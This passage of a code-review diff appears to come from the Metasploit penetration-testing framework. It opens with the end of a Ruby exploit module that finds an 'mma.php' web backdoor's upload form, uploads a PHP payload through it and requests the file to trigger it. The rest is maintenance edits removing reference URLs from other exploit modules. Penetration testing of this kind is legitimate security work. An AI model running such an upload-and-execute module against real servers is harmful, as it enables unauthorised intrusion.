],self.class) # sometimes it is under host/images/mma.php so you may want to set this one
end
def has_input_name?(nodes, name)
nodes.select { |e| e.attributes['name'].value == name }.empty? ? false : true
end
def check
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
if res
n = ::Nokogiri::HTML(res.body)
form = n.at('form[@id="uploader"]')
inputs = form.search('input')
if has_input_name?(inputs, 'file') && has_input_name?(inputs, '_upl')
return Exploit::CheckCode::Appears
end
end
Exploit::CheckCode::Safe
end
def exploit
uri = normalize_uri(target_uri.path)
payload_name = "#{rand_text_alpha(5)}.php"
print_status("#{peer} - Trying to upload #{payload_name} to mma.php Backdoor")
data = Rex::MIME::Message.new
data.add_part('Upload', nil, nil, 'form-data; name="_upl"')
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{payload_name}\"")
post_data = data.to_s
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res
if res.body =~ /uplod d0n3 in SAME file/
print_good("#{peer} - Our payload #{payload_name} has been uploaded. Calling payload...")
register_files_for_cleanup(payload_name)
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
fail_with(Failure::Unknown, 'Connection Timed Out')
end
send_request_cgi({
'uri' => normalize_uri(payload_name),
'method' => 'GET'
})
end
end

2
modules/exploits/multi/http/op5_license.rb
View File

@ -24,8 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote
[
['CVE', '2012-0261'],
['OSVDB', '78064'],
['URL', 'http://www.ekelow.se/file_uploads/Advisories/ekelow-aid-2012-01.pdf'],
['URL', 'http://www.op5.com/news/support-news/fixed-vulnerabilities-op5-monitor-op5-appliance/'],
['URL', 'http://secunia.com/advisories/47417/'],
],
'Privileged' => true,

2
modules/exploits/multi/http/op5_welcome.rb
View File

@ -24,8 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote
[
['CVE', '2012-0262'],
['OSVDB', '78065'],
['URL', 'http://www.ekelow.se/file_uploads/Advisories/ekelow-aid-2012-01.pdf'],
['URL', 'http://www.op5.com/news/support-news/fixed-vulnerabilities-op5-monitor-op5-appliance/'],
['URL', 'http://secunia.com/advisories/47417/'],
],
'Privileged' => true,

1
modules/exploits/multi/http/opmanager_socialit_file_upload.rb
View File

@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2014-6034' ],
[ 'OSVDB', '112276' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ]
],
'Privileged' => true,

3
modules/exploits/multi/http/oracle_reports_rce.rb
View File

@ -41,8 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ "CVE", "2012-3153" ],
[ "OSVDB", "86395" ], # Matches CVE-2012-3152
[ "OSVDB", "86394" ], # Matches CVE-2012-3153
[ "EDB", "31253" ],
[ 'URL', "http://netinfiltration.com" ]
[ "EDB", "31253" ]
],
'Stance' => Msf::Exploit::Stance::Aggressive,
'Platform' => ['win', 'linux'],

3
modules/exploits/multi/http/phpldapadmin_query_engine.rb
View File

@ -32,8 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
['CVE', '2011-4075'],
['OSVDB', '76594'],
['BID', '50331'],
['URL', 'http://sourceforge.net/support/tracker.php?aid=3417184'],
['EDB', '18021'],
['EDB', '18021']
],
'Privileged' => false,
'Payload' =>

1
modules/exploits/multi/http/rails_secret_deserialization.rb
View File

@ -113,7 +113,6 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://charlie.bz/blog/rails-3.2.10-remote-code-execution'], #Initial exploit vector was taken from here
['URL', 'http://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/']
],
'DisclosureDate' => 'Apr 11 2013',

4
modules/exploits/multi/http/splunk_mappy_exec.rb
View File

@ -35,9 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'BID', '51061' ],
[ 'CVE', '2011-4642' ],
[ 'URL', 'http://www.splunk.com/view/SP-CAAAGMM' ],
[ 'URL', 'http://www.sec-1.com/blog/?p=233' ],
[ 'URL', 'http://www.sec-1.com/blog/wp-content/uploads/2011/12/Attacking_Splunk_Release.pdf' ],
[ 'URL', 'http://www.sec-1.com/blog/wp-content/uploads/2011/12/splunkexploit.zip' ]
[ 'URL', 'http://www.sec-1.com/blog/?p=233' ]
],
'Payload' =>
{

3
modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
View File

@ -36,8 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2012-0391'],
[ 'OSVDB', '78277'],
[ 'EDB', '18329'],
[ 'URL', 'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt']
[ 'EDB', '18329']
],
'Platform' => %w{ java linux win },
'Privileged' => true,

3
modules/exploits/multi/http/struts_dev_mode.rb
View File

@ -35,8 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2012-0394'],
[ 'OSVDB', '78276'],
[ 'EDB', '18329'],
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ],
[ 'URL', 'http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/' ]
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ]
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,

Some files were not shown because too many files have changed in this diff Show More